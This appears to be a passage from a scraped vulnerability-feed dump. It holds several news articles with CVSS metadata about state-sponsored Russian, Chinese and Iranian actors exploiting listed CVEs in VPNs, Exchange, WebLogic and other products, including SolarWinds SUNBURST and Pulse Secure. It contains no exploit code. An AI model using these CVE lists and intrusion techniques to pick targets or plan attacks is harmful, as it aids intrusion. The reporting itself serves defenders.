Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:19", "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-02-18T13:30:09", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here In a joint cybersecurity advisory, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) revealed that Russian state-sponsored threat actors targeted U.S. defense contractors from January 2020 to February 2022. The threat actors exfiltrated sensitive data from small and large companies in the U.S. working on defense and intelligence contracts, including missile development, vehicle &amp; aircraft and software development. 